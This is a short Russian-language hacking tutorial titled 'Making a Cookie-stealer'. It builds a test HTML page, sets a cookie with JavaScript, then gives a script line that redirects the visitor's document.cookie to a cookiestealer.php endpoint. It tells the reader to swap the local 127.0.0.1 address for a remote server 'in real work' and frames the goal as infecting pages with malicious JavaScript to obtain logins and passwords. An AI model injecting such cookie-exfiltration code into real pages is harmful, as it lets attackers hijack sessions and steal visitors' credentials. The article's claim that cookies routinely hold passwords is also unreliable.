Делаем Cookie-стиллер
INHIDEJavaScript – один из самых распространенных языков, используемых в веб-программировании. Он скрывает в себе множество полезных возможностей для работы с сайтами, хотя некоторые их них не столь однозначны (например, сборщик куки, который мы будем использовать в этой статье).
Куки (cookies) – данные, запрашиваемые веб-сайтом в целях “запоминания” пользователя. Содержат в себе: время посещения сайта, устройство подключения, логины, пароли и прочую деликатную информацию – чтобы их заполучить, мы попробуем заразить исходный html-код страницы вредоносным javascript.
#Создание тестовой HTML страницы
Для начала, создадим новую директорию, где будет ютиться наш html-файл:
mkdir cookiestealer
И переместимся в неё командой
cd cookiestealer
Оказавшись в директории, создадим файл "index.html" командой
touch index.html
Далее займемся его наполнением
nano index.html
Добавьте стандартные html-теги в документ:
<html> <body> </body> </html>
Получится что-то вроде этого
Теперь сохраняйте документ сочетанием клавиш Ctrl+O. Если мы откроем этот файл в нашем браузере, увидим пустую страницу (это логично).
#Создание cookies
Мы можем самостоятельно создать cookies добавив одну лишь строчку в нашу тестовую html-страницу:
<script type="text/javascript"> document.cookie = "username=Null Byte"; </script>
В редакторе впишите эту строку между тегами “body” как указано на скриншоте:
Если Вы откроете веб-страницу еще раз после сохранения, внешне ничего не изменится, но “под капотом” уже появились наши cookies. Чтобы их посмотреть добавим в наш javascript команду вывода:
document.write(document.cookie);
Наш скрипт теперь выглядит вот так:
Еще раз сохраните и откройте через браузер – теперь Вы видите наши самодельные cookies.
Не забудьте потом стереть команду “document.write(document.cookie);” из файла – мы же не хотим показывать cookie в дальнейшем.
#Воруем cookies при помощи JavaScript
Используя JavaScript, перенаправим вывод куки на сервер для дальнейшего использования командой:
document.location='http://127.0.0.1 /cookiestealer.php?c='+document.cookie;
В примере я использую локальный адрес 127.0.0.1 – в настоящей работе Вы должны использовать адрес файла, расположенного на удаленном сервере.
Теперь Ваш html-файл должен выглядеть примерно вот так:
Этого вполне достаточно, чтобы перенаправить cookies в необходимое нам место.